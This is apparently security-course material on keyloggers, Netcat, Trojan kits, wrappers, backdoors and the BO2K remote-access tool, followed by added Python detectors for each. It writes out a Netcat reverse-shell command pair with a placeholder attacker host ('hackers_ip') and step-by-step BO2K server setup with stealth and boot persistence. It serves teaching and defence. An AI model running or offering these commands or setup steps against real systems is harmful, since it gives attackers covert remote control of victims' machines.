Another powerful way of extracting information from a victim’s system is to use a piece of technology known as a keylogger. Software in this category is designed to capture and report activity in the form of keyboard usage on a target system. When placed on a system, it gives the attacker the ability to monitor all activity on a system and reports back to the attacker. Under the right conditions, this software can capture passwords, confidential information, and other data.

Some of the keystroke recorders are these:

IKS Software Keylogger A Windows-based keylogger that runs in the background on a system at a very low level. Due to the way this software is designed and runs, it is very hard to detect using most conventional means. The program is designed to run at such a low level that it does not show up in process lists or through normal detection methods.

Ghost Keylogger Another Windows-based keylogger that is designed to run silently in the background on a system, much like IKS. The difference between this software and IKS is that it can record activity to an encrypted log that can be emailed to the attacker.

Spector Pro Designed to capture keystroke activity, email passwords, chat conversations and logs, and instant messages.

Fakegina An advanced keylogger that is very specific in its choice of targets. This software component is designed to capture usernames and passwords from a Windows system. Specifically, it intercepts the communication between the Winlogon process and the logon GUI in Windows.

Netcat is a simple command-line utility available for Linux, Unix, and Windows platforms. It is designed to read information from connections using TCP or UDP and do simple port redirection on them as configured.

Let’s look at the steps involved to use Netcat to perform port redirection. The first step is for the hacker to set up what is known as a listener on their system. This prepares the attacker’s system to receive the information from the victim’s system. To set up a listener, the command is as follows:

nc -v -l -p 80

In this example, nc is run with the -v switch for verbose mode, which provides additional information; -l means to listen and -p tells the program to listen on a specific port.

After this, the attacker needs to execute the following command on the victim’s system to redirect the traffic to their system:

nc hackers_ip 80 -e "cmd.exe"

In this second command the desired IP is entered and then followed by a port number; the -e states that the executable following the switch is to be run on connect.

Once this is entered, the net effect is that the command shell on the victim’s system is at the attacker’s command prompt, ready for input as desired.

Of course, Netcat has some other capabilities, including port scanning and placing files on a victim’s system. Port scanning can be accomplished using the following command:

nc -v -z -w1 IPaddress <start port>-<ending port>

The following is a list of options available for Netcat:

  • nc -d Detaches Netcat from the console
  • nc -l -p [port] Creates a simple listening TCP port; adding -u places it into UDP mode
  • nc -e [program] Redirects stdin/stdout from a program
  • nc -w [timeout] Sets a timeout before Netcat automatically quits
  • program | nc Pipes program output to Netcat
  • nc | program Pipes Netcat output to a program
  • nc -h Displays help options
  • nc -v Puts Netcat into verbose mode
  • nc -g or nc -G Specifies source routing flags
  • nc -t Used for Telnet negotiation
  • nc -o [file] Hex-dumps traffic to a file
  • nc -z Used for port scanning without transmitting data

MODULE: 7.9.4 Trojan Construction Kits

As with viruses and worms, several construction kits are available that allow for the rapid creation and deployment of Trojans. The availability of these kits has made designing and deploying malware easier than ever before:

Trojan Construction Kit: One of the best examples of a relatively easy-to-use but potentially destructive tool. This kit is command-line based, which may make it a little less accessible to the average person, but it is nonetheless very capable in the right hands. With a little effort, it is possible to build a Trojan that can engage in destructive behavior such as destroying partition tables, master boot records (MBRs), and hard drives.

Senna Spy: Another Trojan-creation kit that provides custom options, such as file transfer, executing DOS commands, keyboard control, and listing and controlling processes.

Stealth Tool: A program used not to create Trojans but to assist them in hiding. In practice, this tool is used to alter the target file by moving bytes, changing headers, splitting files, and combining files.


Many attackers gain access to their target system through a backdoor. The owner of a system compromised in this way may have no indication that someone else is using the system. When implemented, a backdoor typically achieves one or more of the following key goals:

  • Lets an attacker access a system later by bypassing any countermeasures the system owner may have placed.
  • Provides the ability to gain access to a system while keeping a low profile. This allows an attacker to access a system and circumvent logging and other detective methods.
  • Provides the ability to access a system with minimal effort in the least amount of time. Under the right conditions, a backdoor lets an attacker gain access to a system without having to repeat the original compromise.

Some common backdoors that are placed on a system are of the following types and purposes:

  • Password-cracking backdoor—Backdoors of this type rely on an attacker uncovering and exploiting weak passwords that have been configured by the system owner.
  • Process-hiding backdoor—An attacker who wants to stay undetected for as long as possible typically chooses to go the extra step of hiding the software they are running. Programs such as a compromised service, a password cracker, sniffers, and rootkits are items that an attacker will configure so as to avoid detection and removal. Techniques include renaming a package to the name of a legitimate program and altering other files on a system to prevent them from being detected and running.

Once a backdoor is in place, an attacker can access and manipulate the system at will.
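The process-hiding backdoor described above relies on borrowing the name of a legitimate program, which is also its weakness: the name matches, but the image path, the image hash and the parent process usually do not. The following is an added example, not code from the original notes, that checks a process snapshot against a known-good baseline on all three points. The baseline entries, the placeholder hash values and the process snapshot are constructed for the example; in practice the baseline comes from a known-good host or the vendor’s file catalog.

```python
"""Detect a process-hiding backdoor that borrows a legitimate program's name (added example).

The baseline, the hashes and the process snapshot are all constructed; in
practice the baseline comes from a known-good host or the vendor's catalog.
"""
from typing import Dict, List, NamedTuple, Tuple


class Proc(NamedTuple):
    pid: int
    name: str       # image name as shown by the task list
    path: str       # full path of the on-disk image
    sha256: str     # hash of that image
    parent: str     # image name of the parent process


# Constructed baseline: expected path, image hash and parent for names an
# attacker is likely to borrow. The hash values are placeholders.
BASELINE: Dict[str, Tuple[str, str, str]] = {
    "svchost.exe":  ("c:/windows/system32/svchost.exe", "a1" * 32, "services.exe"),
    "lsass.exe":    ("c:/windows/system32/lsass.exe",   "b2" * 32, "wininit.exe"),
    "explorer.exe": ("c:/windows/explorer.exe",         "c3" * 32, "userinit.exe"),
}


def norm(path: str) -> str:
    """Normalise a Windows path for comparison."""
    return path.replace("\\", "/").lower()


def check_process(proc: Proc, baseline=BASELINE) -> List[str]:
    """Return one finding per mismatch between the process and the baseline for its name."""
    expected = baseline.get(proc.name.lower())
    if expected is None:
        return []                       # name not in the baseline: nothing to compare
    exp_path, exp_hash, exp_parent = expected
    findings = []
    if norm(proc.path) != exp_path:
        findings.append(f"pid {proc.pid}: {proc.name} runs from {proc.path}, expected {exp_path}")
    if proc.sha256.lower() != exp_hash:
        findings.append(f"pid {proc.pid}: {proc.name} image hash differs from the baseline")
    if proc.parent.lower() != exp_parent:
        findings.append(f"pid {proc.pid}: {proc.name} started by {proc.parent}, expected {exp_parent}")
    return findings


def triage(snapshot: List[Proc], baseline=BASELINE) -> Dict[int, List[str]]:
    """Map pid -> findings for every process that fails at least one check."""
    result: Dict[int, List[str]] = {}
    for proc in snapshot:
        findings = check_process(proc, baseline)
        if findings:
            result[proc.pid] = findings
    return result


# Constructed snapshot: two genuine system processes and one renamed backdoor.
SNAPSHOT = [
    Proc(712,  "svchost.exe", r"C:\Windows\System32\svchost.exe", "a1" * 32, "services.exe"),
    Proc(640,  "lsass.exe",   r"C:\Windows\System32\lsass.exe",   "b2" * 32, "wininit.exe"),
    Proc(4120, "svchost.exe", r"C:\Users\Public\svchost.exe",     "ff" * 32, "cmd.exe"),
]

if __name__ == "__main__":
    for pid, findings in triage(SNAPSHOT).items():
        for finding in findings:
            print(finding)
```

The three checks are deliberately independent: a backdoor dropped into the real System32 path with the real name still fails the hash check, and one that replaces the genuine binary in place still fails the parent check when it was launched from a shell rather than by the service control manager.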



MODULE 7.9.3 Distributing Trojans

Once a Trojan has been created, you must address how to get it onto a victim’s system. For this step, many options are available, including tools known as wrappers.

Using Wrappers to Install Trojans

Using wrappers, attackers can take their intended payload and merge it with a harmless executable to create a single executable from the two. Some more advanced wrapper-style programs can even bind together several applications rather than just two. At this point, the new executable can be posted in a location where it is likely to be downloaded.

Consider a situation in which a would-be attacker downloads an authentic application from a vendor’s website and uses wrappers to merge a Trojan (BO2K) into the application before posting it on a newsgroup or other location. What looks harmless to the downloader is actually a bomb waiting to go off on the system. When the victim runs the infected software, the infector installs and takes over the system.

Some of the better-known wrapper programs are the following:

  • EliteWrap is one of the most popular wrapping tools, due to its rich feature set that includes the ability to perform redundancy checks on merged files to make sure the process went properly and the ability to check if the software will install as expected. The software can be configured to the point of letting the attacker choose an installation directory for the payload. Software wrapped with EliteWrap can be configured to install silently without any user interaction.
  • Saran Wrap is specifically designed to work with and hide Back Orifice. It can bundle Back Orifice with an existing program into what appears to be a standard program using Install Shield.
  • Trojan Man merges programs and can encrypt the new package in order to bypass antivirus programs.
  • Teflon Oil Patch is designed to bind Trojans to a specified file in order to defeat Trojan-detection applications.
  • Restorator was designed with the best of intentions but is now used for less-than-honorable purposes. It can add a payload to, for example, a seemingly harmless screen saver, before it is forwarded to the victim.

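A wrapped executable of the kind described above carries two complete programs in one file, and a download that has been through a wrapper no longer matches the digest the vendor published. The following is an added example, not code from the original notes or from any of the tools listed: a Python scanner that walks a file for every MZ header whose e_lfanew pointer lands on a PE signature, reports more than one as a binder footprint, and compares the file’s SHA-256 with an expected vendor digest. The make_fake_pe helper, the sample “clean” and “wrapped” files and the vendor digest are constructed for the example; the fake images contain only the header fields the scanner reads and are not loadable programs.

```python
"""Two checks for a download that may have been through a wrapper (added example).

make_fake_pe builds a constructed stand-in for a PE file: just the MZ header,
the e_lfanew pointer at offset 0x3C and the PE signature it points to. Nothing
here is loadable; it exists only so the scanner has realistic input.
"""
import hashlib
import struct
from typing import List


def make_fake_pe(size: int, tag: bytes) -> bytes:
    """Constructed PE look-alike: 'MZ' ... e_lfanew=0x40 at 0x3C ... 'PE\\0\\0' at 0x40."""
    header = bytearray(b"MZ" + b"\x00" * 0x3A)    # pads the DOS header up to offset 0x3C
    header += struct.pack("<I", 0x40)             # e_lfanew: where the PE signature lives
    header += b"PE\x00\x00" + tag                 # signature followed by a marker body
    assert len(header) <= size
    return bytes(header) + b"\x00" * (size - len(header))


def find_pe_headers(blob: bytes) -> List[int]:
    """Offsets of every MZ header whose e_lfanew really points at a PE signature."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if e_lfanew >= 0x40 and blob[sig:sig + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def looks_wrapped(blob: bytes) -> bool:
    """A second complete PE image inside one file is the usual footprint of a binder."""
    return len(find_pe_headers(blob)) > 1


def matches_vendor_hash(blob: bytes, expected_sha256: str) -> bool:
    """The cheap check: compare with the digest the vendor publishes next to the download."""
    return hashlib.sha256(blob).hexdigest() == expected_sha256.lower()


# Constructed sample files.
CLEAN_APP = make_fake_pe(0x400, b"VENDOR-APP")
PAYLOAD = make_fake_pe(0x200, b"PAYLOAD")
WRAPPED_APP = CLEAN_APP + PAYLOAD                        # wrapper output: host first, payload appended
VENDOR_SHA256 = hashlib.sha256(CLEAN_APP).hexdigest()   # stands in for the vendor's published digest

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_APP), ("wrapped", WRAPPED_APP)):
        print(label, "PE headers at", [hex(o) for o in find_pe_headers(blob)],
              "vendor hash ok:", matches_vendor_hash(blob, VENDOR_SHA256))
```

Treat the embedded-PE count as a triage signal rather than a verdict: legitimate self-extracting installers also carry a second image, and a wrapper that encrypts its payload, as Trojan Man is described as doing above, leaves no second PE signature to find. The hash comparison catches both cases, which is why it is the check to run first on anything downloaded from a newsgroup or mirror rather than from the vendor.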

MODULE 7.9.2 An In-Depth Look at BO2K

Whether you consider it a Trojan or a remote administrator tool, the capabilities of BO2K are fairly extensive for something of this type. This list of features is adapted from the manufacturer’s website:

  • Address book–style server list
  • Functionality that can be extended via the use of plug-ins
  • Multiple simultaneous server connections
  • Session-logging capability
  • Native server support
  • Keylogging capability
  • Hypertext Transfer Protocol (HTTP) file system browsing and transfer
  • Microsoft Networking file sharing
  • Remote registry editing
  • File browsing, transfer, and management
  • Plug-in extensibility
  • Remote upgrading, installation, and uninstallation
  • Network redirection of Transmission Control Protocol/Internet Protocol (TCP/IP) connections
  • Ability to access console programs such as command shells through Telnet
  • Multimedia support for audio/video capture and audio playback
  • Windows NT registry passwords and Win9x screen saver password dumping
  • Process control: start, stop, and list
  • Multiple client connections over any medium
  • GUI message prompts

BO2K is a next-generation tool that was designed to accept customized, specially designed plug-ins. It is a dangerous tool in the wrong hands. With the software’s ability to be configured to carry out a diverse set of tasks at the attacker’s behest, it can be a devastating tool.

BO2K consists of two software components: a client and a server. To use the BO2K server, the configuration is as follows:

  1. Start the BO2K Wizard, and click Next when the wizard’s splash screen appears.
  2. When prompted by the wizard, enter the server executable to be edited.
  3. Choose the protocol over which to run the server communication. The typical choice is to use TCP as the protocol, due to its inherent robustness. UDP is typically used if a firewall or other security architecture needs to be traversed.
  4. The next screen asks what port number will be used. Port 80 is generally open, and so it’s most often used, but you can use any open port.
  5. In the next screen, enter a password that will be used to access the server. Note that passwords can be used, but you can also choose open authentication—that means anyone can gain access without having to supply credentials of any kind.
  6. When the wizard finishes, the server-configuration tool is provided with the information you entered.
  7. The server can be configured to start when the system starts up. This allows the program to restart every time the system is rebooted, preventing the program from becoming unavailable.
  8. Click Save Server to save the changes and commit them to the server.

Once the server is configured, it is ready to be installed on the victim’s system.

No matter how the installation is to take place, the only application that needs to be run on the target system is the BO2K executable. After this application has run, the previously configured port is open on the victim’s system and ready to accept input from the attacker.

The application also runs an executable file called Umgr32.exe and places it in the Windows system32 folder. In addition, if you configure the BO2K executable to run in stealth mode, it does not show up in Task Manager—it modifies an existing running process to act as its cover. If stealth was not configured, the application appears as a Remote Administration Service.

The attacker now has a foothold on the victim’s system.
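The description above gives a defender three things to look for on a suspect host: a listening port that the host’s role does not explain, the owning image Umgr32.exe under System32 or a service presenting itself as Remote Administration Service, and a run-at-boot entry for that image. The following is an added example, not code from the original notes or from BO2K itself, that correlates a listener list with a process and service table and scores each unexpected listener. The expected-listener table, the port numbers, the PIDs and the snapshot records are constructed for the example; only the image name and service name come from the text above.

```python
"""Host triage for the footprint described above: an unexpected listening port
owned by an image in System32 that also persists at boot (added example).

The snapshot below is constructed to mimic netstat, tasklist and service
listings; the indicator names come from the text above, the rest is assumed.
"""
from typing import Dict, List, NamedTuple


class Listener(NamedTuple):
    proto: str
    port: int
    pid: int


class Process(NamedTuple):
    pid: int
    image: str
    service_name: str     # display name if the process runs as a service, else ""
    autostart: bool       # has a run-at-boot entry


# Expected listeners for this host's role: (proto, port) -> owning image. Constructed.
EXPECTED_LISTENERS = {
    ("tcp", 445):  "system",
    ("tcp", 3389): "c:/windows/system32/svchost.exe",
}
# Indicators taken from the description above.
INDICATOR_IMAGES = {"umgr32.exe"}
INDICATOR_SERVICES = {"remote administration service"}


def norm(path: str) -> str:
    return path.replace("\\", "/").lower()


def basename(path: str) -> str:
    return norm(path).rsplit("/", 1)[-1]


def triage_listeners(listeners: List[Listener], procs: Dict[int, Process]) -> List[dict]:
    """Return one finding per listener that the baseline or the indicators do not explain."""
    findings = []
    for lst in listeners:
        proc = procs.get(lst.pid)
        if proc is None:
            # Stealth mode hides the process from the task list, but the socket is still there.
            findings.append({"pid": lst.pid, "port": lst.port, "severity": "medium",
                             "reasons": ["listener with no visible owning process"]})
            continue
        reasons = []
        expected = EXPECTED_LISTENERS.get((lst.proto, lst.port))
        if expected is None or expected != norm(proc.image):
            reasons.append(f"{lst.proto}/{lst.port} not expected for {proc.image}")
        if basename(proc.image) in INDICATOR_IMAGES:
            reasons.append("image name matches a known BO2K indicator")
        if proc.service_name.lower() in INDICATOR_SERVICES:
            reasons.append("service name matches a known BO2K indicator")
        if not reasons:
            continue
        severity = "high" if proc.autostart or len(reasons) > 1 else "medium"
        if proc.autostart:
            reasons.append("image also persists at boot")
        findings.append({"pid": lst.pid, "port": lst.port, "severity": severity, "reasons": reasons})
    return findings


# Constructed snapshot of a host carrying the BO2K server on port 80, plus one
# listener whose owner is not in the task list at all.
LISTENERS = [
    Listener("tcp", 445, 4),
    Listener("tcp", 3389, 812),
    Listener("tcp", 80, 1337),
    Listener("tcp", 8080, 2208),
]
PROCESSES = {
    4:    Process(4, "System", "", True),
    812:  Process(812, r"C:\Windows\System32\svchost.exe", "TermService", True),
    1337: Process(1337, r"C:\Windows\System32\Umgr32.exe", "Remote Administration Service", True),
}

if __name__ == "__main__":
    for f in triage_listeners(LISTENERS, PROCESSES):
        print(f["severity"], "pid", f["pid"], "port", f["port"], "; ".join(f["reasons"]))
```

Because the server can be configured to hide from Task Manager, the listener list should come from the network stack (netstat or the equivalent API) rather than from the process list, and a socket whose PID is missing from that list is reported on its own. Port 80 being “generally open” is exactly why the check is keyed on the owning image and not on the port number alone.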